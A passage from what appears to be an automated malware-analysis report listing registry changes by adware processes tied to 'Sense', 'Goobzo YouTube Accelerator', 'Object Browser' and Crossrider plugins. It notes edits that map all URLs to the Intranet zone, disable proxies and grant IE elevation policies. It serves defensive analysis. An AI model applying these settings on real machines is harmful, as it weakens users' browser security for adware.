    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    "UNCAsIntranet" = "1"

    Proxy settings are disabled:

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan deletes the following value(s) in system registry:

    [HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyOverride"
    "AutoConfigURL"
    "ProxyServer"

    The process Udugcvjfj.exe:3492 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e9aa9974-7188-449e-bc15-a461971707ac}]
    "Policy" = "1"

    [HKLM\System\CurrentControlSet\Control\Session Manager]
    "PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv6.tmp\AccDownload.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv6.tmp\nsProcess.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv6.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy1B.tmp\extensionData\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy1B.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx23.tmp\extensionData\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx23.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn29.tmp\extensionData\,"

    [HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{06f9c542-63ca-47a4-a81f-3b5e3594d3a6}]
    "Bic" = "4252D7B4B8E54E2E95F19018ADCF24D9IE"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
    "CrPublisherId" = "20891"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e9aa9974-7188-449e-bc15-a461971707ac}]
    "AppName" = "Sense-bg.exe"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5c710204-1cb1-4056-bb74-9cb773561d7b}]
    "AppPath" = "%Program Files%\Sense"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e01b9db3-5c33-43f0-9ca2-084c14f59734}]
    "AppName" = "Sense-buttonutil.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
    "CrAppId" = "48292"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e01b9db3-5c33-43f0-9ca2-084c14f59734}]
    "Policy" = "3"

    [HKLM\SOFTWARE\InstalledBrowserExtensions\20891\Status]
    "Installed" = "1"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5c710204-1cb1-4056-bb74-9cb773561d7b}]
    "AppName" = "Sense-codedownloader.exe"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e9aa9974-7188-449e-bc15-a461971707ac}]
    "Policy" = "1"
    "AppPath" = "%Program Files%\Sense"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    "Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

    [HKCU\Software\InstalledBrowserExtensions\20891\Status]
    "Installed" = "1"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e01b9db3-5c33-43f0-9ca2-084c14f59734}]
    "AppPath" = "%Program Files%\Sense"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
    "Sense-bg.exe" = "8000"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e9aa9974-7188-449e-bc15-a461971707ac}]
    "AppPath" = "%Program Files%\Sense"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKLM\SOFTWARE\GlobalUpdate\UpdateDev]
    "AuCheckPeriodMs" = "21600000"

    [HKLM\SOFTWARE\InstalledBrowserExtensions\20891]
    "48292" = "Sense"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5c710204-1cb1-4056-bb74-9cb773561d7b}]
    "AppPath" = "%Program Files%\Sense"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5c710204-1cb1-4056-bb74-9cb773561d7b}]
    "AppName" = "Sense-codedownloader.exe"
    "Policy" = "3"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e01b9db3-5c33-43f0-9ca2-084c14f59734}]
    "AppPath" = "%Program Files%\Sense"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKCU\Software\InstalledBrowserExtensions\Object Browser]
    "48292" = "Sense"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKLM\SOFTWARE\Sense\Installer]
    "BundledFirefox" = "1"

    [HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{06f9c542-63ca-47a4-a81f-3b5e3594d3a6}]
    "pv" = "1.3.25.0"

    [HKLM\SOFTWARE\Sense\Installer]
    "BundledIe" = "1"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e01b9db3-5c33-43f0-9ca2-084c14f59734}]
    "AppName" = "Sense-buttonutil.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
    "UninstallString" = "%Program Files%\Sense\Uninstall.exe /fcp=1"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e01b9db3-5c33-43f0-9ca2-084c14f59734}]
    "Policy" = "3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
    "DisplayName" = "Sense"

    [HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{06f9c542-63ca-47a4-a81f-3b5e3594d3a6}]
    "Verifier" = "06a66a2d5edd8e17cc634fade0ffd159"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "4B 5D BD C2 A7 6E 58 03 B1 2E FC 47 B2 9C 56 FC"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e9aa9974-7188-449e-bc15-a461971707ac}]
    "AppName" = "Sense-bg.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5c710204-1cb1-4056-bb74-9cb773561d7b}]
    "Policy" = "3"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
    "DisplayIcon" = "%Program Files%\Sense\utils.exe"

    [HKLM\SOFTWARE\Sense\Installer]
    "BundledChrome" = "1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
    "BaseClass" = "Drive"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
    "Publisher" = "Object Browser"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
    "DisplayVersion" = "1.34.5.12"

    [HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{06f9c542-63ca-47a4-a81f-3b5e3594d3a6}]
    "srcid_var" = "000803"

    [HKCU\Software\InstalledBrowserExtensions\20891]
    "48292" = "Sense"

    [HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{06f9c542-63ca-47a4-a81f-3b5e3594d3a6}]
    "Name" = "Object Browser"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process setup.exe:264 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Goobzo\YouTube Accelerator\Success]
    "InstallStr" = "ok"
    "Install" = "1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    [HKLM\SOFTWARE\SearchModule\Success]
    "InstallStr" = "ok"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MaxConnectionsPerServer" = "2"
    "MaxConnectionsPer1_0Server" = "2"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKLM\SOFTWARE\SearchModule\Success]
    "Install" = "1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "0C 17 17 39 48 AE 40 4D 9F AA C8 0D 7E CF 52 4E"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process testlsp.exe:2720 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKLM\SOFTWARE\Goobzo\YouTube Accelerator\Tracer]
    "TraceLevel" = "3"

    [HKCU\Software\Goobzo\YouTube Accelerator\Tracer]
    "TraceDestination" = "3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKLM\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion\Parameters]
    "TrapPollTimeMilliSecs" = "15000"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKCU\Software\Goobzo\YouTube Accelerator\Tracer]
    "TimeStamp" = "0"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKLM\SOFTWARE\Goobzo\YouTube Accelerator\Tracer]
    "TraceDestination" = "3"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKLM\SOFTWARE\Goobzo\YouTube Accelerator\Tracer]
    "TimeLimit" = "1"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKCU\Software\Goobzo\YouTube Accelerator\Tracer]
    "TimeLimit" = "0"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 2A 00 00 00 01 00 00 00 00 00 00 00"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKLM\SOFTWARE\Goobzo\YouTube Accelerator\Tracer]
    "TracerDoBackup" = "1"
    "TimeStamp" = "1401908133"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "21 AB 7F 76 11 01 DF CD 49 2C 4C 22 13 86 DC E7"

    [HKCU\Software\Goobzo\YouTube Accelerator\Tracer]
    "TraceLevel" = "3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKLM\SOFTWARE\Licenses]
    "{03B3ED09D712B0615}" = "56 3E A8 0E 0B A2 A7 A6 41 06 53 98 3A A5 44 A3"
    "{I3B3ED09D712B0615}" = "14 00 00 00"

    [HKCU\Software\Goobzo\YouTube Accelerator\Tracer]
    "TracerDoBackup" = "1"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process object browser-bg.exe:2252 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Object Browser\Db\Internal\monetization_plugin_bundledUrls]
    "Expiration" = "1896127200"

    [HKCU\Software\Object Browser\Db\Internal\Resources_meta]
    "Value" = "{}"

    [HKCU\Software\Object Browser\Db\Internal\monetization_plugin_notBundledArr_]
    "Value" = "[]"

    [HKCU\Software\Object Browser\Db\Async-Internal\monetization_plugin_firstRun]
    "Expiration" = "1717268198"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 2D 00 00 00 01 00 00 00 00 00 00 00"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    [HKCU\Software\Object Browser\Db\Async-Internal\monetization_plugin_is_install_reported_]
    "Expiration" = "1717268197"

    [HKCU\Software\Object Browser\Db\Async-Internal\monetization_plugin_override_verticals]
    "Expiration" = "1717268198"

    [HKCU\Software\Object Browser\Db\Internal\Resources_queue]
    "Value" = "{}"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Personal" = "%Documents and Settings%\%current user%\My Documents"

    [HKCU\Software\Object Browser\Db\Async-Internal\monetization_plugin_monetization_plugins_ids]
    "Expiration" = "1717268198"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKCU\Software\Object Browser\Db\Internal\Resources_nextCheck]
    "Expiration" = "1401929797"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKCU\Software\Object Browser\Db\Internal\Resources_appVer]
    "Expiration" = "1896127200"

    [HKCU\Software\Object Browser\Db\Async-Internal\monetization_plugin_firstRun]
    "Value" = "false"

    [HKCU\Software\Object Browser\Db\Async-Internal\monetization_plugin_plugins_version_]
    "Value" = "47"

    [HKCU\Software\Object Browser\Db\Internal\monetization_plugin_bundledUrls]
    "Value" = "{""dealply_s"":{""urls"":[""ssfiles.com""]},""dealply_p"":{""urls"":[""i_crdrjs_info""

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
    "BaseClass" = "Drive"

    [HKCU\Software\Object Browser\Db\Internal\Resources_meta]
    "Expiration" = "1896127200"

    [HKCU\Software\Object Browser\background]
    "IsEnabled" = "1"

    [HKCU\Software\Object Browser\Db\Internal\Resources_appVer]
    "Value" = "200"

    [HKCU\Software\Crossrider\onBeforeNavigate]
    "32850" = ""

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKCU\Software\Object Browser\Db\Internal\Resources_nextCheck]
    "Value" = "true"

    [HKCU\Software\Object Browser\Db\Async-Internal\monetization_plugin_monetization_plugins_delay]
    "Expiration" = "1717268198"

    [HKCU\Software\Object Browser\Db\Async-Internal\monetization_plugin_monetization_plugins_ids]
    "Value" = "[93,102,104,244]"

    [HKCU\Software\Object Browser\Db\Async-Internal\monetization_plugin_lastUpdate]
    "Expiration" = "1717268197"

    [HKCU\Software\Crossrider\onRequest]
    "32850" = ""

    [HKCU\Software\Object Browser\background]
    "__onDocumentStart_script__" = ""

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKCU\Software\Object Browser\Db\Async-Internal\monetization_plugin_override_verticals]
    "Value" = "{}"

    [HKCU\Software\Object Browser\Db\Internal\monitor.onRequest]
    "Value" = "false"

    [HKCU\Software\Object Browser\Db\Async-Internal\monetization_plugin_plugins_version_]
    "Expiration" = "1717268198"

    [HKCU\Software\Object Browser\Db\Async-Internal\monetization_plugin_is_install_reported_]
    "Value" = "true"

    [HKCU\Software\Object Browser\Db\Internal\Resources_lastVersion]
    "Expiration" = "1896127200"

    [HKCU\Software\Object Browser\Db\Internal\Resources_queue]
    "Expiration" = "1896127200"

    [HKCU\Software\Object Browser\Db\Async-Internal\monetization_plugin_monetization_plugins_delay]
    "Value" = "{93:0,102:0,104:0,244:0}"

    [HKCU\Software\Object Browser\Db\Internal\monitor.onRequest]
    "Expiration" = "1896127200"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKCU\Software\Object Browser\Db\Async-Internal\monetization_plugin_lastUpdate]
    "Value" = "1401908197838"

    [HKCU\Software\Object Browser\Db\Internal\monitor.onRedirect]
    "Value" = "false"

    [HKCU\Software\Object Browser\Db\Internal\monitor.onBeforeNavigate]
    "Expiration" = "1896127200"

    [HKCU\Software\Object Browser\Db\Async-Internal\monetization_plugin_last_report_errors]
    "Expiration" = "1717268209"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "C2 BE 30 07 8F 52 6C E9 86 88 88 EC CD 7E CD C5"

    [HKCU\Software\Object Browser\Db\Internal\monitor.onBeforeNavigate]
    "Value" = "false"

    [HKCU\Software\Object Browser\Db\Internal\Resources_lastVersion]
    "Value" = "1"

    [HKCU\Software\Object Browser\Db\Async-Internal\monetization_plugin_stats_]
    "Expiration" = "1717268197"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
    "BaseClass" = "Drive"

    [HKCU\Software\Object Browser\background]
    "__onDocumentStart_script_store__" = ""

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKCU\Software\Object Browser\Db\Internal\monetization_plugin_notBundledArr_]
    "Expiration" = "1896127200"

    [HKCU\Software\Object Browser\Db\Async-Internal\monetization_plugin_stats_]
    "Value" = "{""bic"":""4252D7B4B8E54E2E95F19018ADCF24D9IE""

    [HKCU\Software\Object Browser\Db\Internal\monitor.onRedirect]
    "Expiration" = "1896127200"

